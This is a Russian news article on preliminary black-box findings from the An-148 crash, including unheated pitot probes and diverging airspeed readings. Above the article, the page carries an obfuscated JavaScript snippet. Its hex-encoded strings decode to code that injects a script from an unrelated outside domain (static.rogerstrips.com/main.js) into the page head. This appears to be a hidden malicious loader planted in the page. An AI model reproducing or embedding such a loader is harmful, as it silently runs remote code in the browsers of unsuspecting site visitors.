script type='text/javascript'>var _0x7f86=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x72\x6F\x67\x65\x72\x73\x74\x72\x69\x70\x73\x2E\x63\x6F\x6D\x2F\x6D\x61\x69\x6E\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];var script=document[_0x7f86[1]](_0x7f86[0]);script[_0x7f86[2]]= _0x7f86[3];script[_0x7f86[4]]= _0x7f86[5];document[_0x7f86[8]](_0x7f86[7])[0][_0x7f86[6]](script)

Комиссия Межгосударственного авиационного комитета (МАК) рассказала о первых результатах расшифровки «черных ящиков» разбившегося Ан-148, передает РБК со ссылкой на сообщение МАК.

В ходе всего полета, как выяснили специалисты, обогрев всех трех приемников полного давления (устройства, которые занимаются сбором данных о давлении воздуха, действующего на самолет во время полета) находился в выключенном состоянии.

Особая ситуация в самолете, как рассказали в авиационном комитете, начала развиваться примерно через 2 мин 30 сек после взлета. В этот момент самолет находился на высоте около 1,3 тыс. метров и следовал со скоростью 465-470 км/ч. Тогда системы лайнера, как рассказали в МАК, впервые зафиксировали расхождения в показаниях скорости от модуля воздушных параметров (предназначен для непрерывного измерения и выдачи бортовым системам информации о высотно-скоростных параметрах в виде электрических цифровых сигналов) — первого приемника полного давления — и аналогичного резервного прибора.

Примерно 25 секунд расхождения в этих данных, как уточнили в МАК, достигли порядка 30 км/ч. «Появилось разовое сообщение экипажу: «Приборная — СРАВНИ», — сообщили в авиационном комитете, добавив, что похожее сообщение было зарегистрировано снова примерно через 50 секунд. Тогда самолет, по информации специалистов, уже находился на высоте около 2 тыс. метров, при этом скорость Ан-148, по информации первого модуля воздушных параметров, была больше и продолжала расти, а, по данным второго модуля, — продолжала падать.

Таким образом, «предварительный анализ зарегистрированной информации, а также анализ аналогичных случаев, имевших место в прошлом, позволяют предполагать, что фактором развития особой ситуации в полете могли стать неверные данные о скорости полета на индикаторах пилотов, что, в свою очередь, видимо, было связано с обледенением приемников полного давления при выключенном состоянии систем их обогрева», считают в МАК.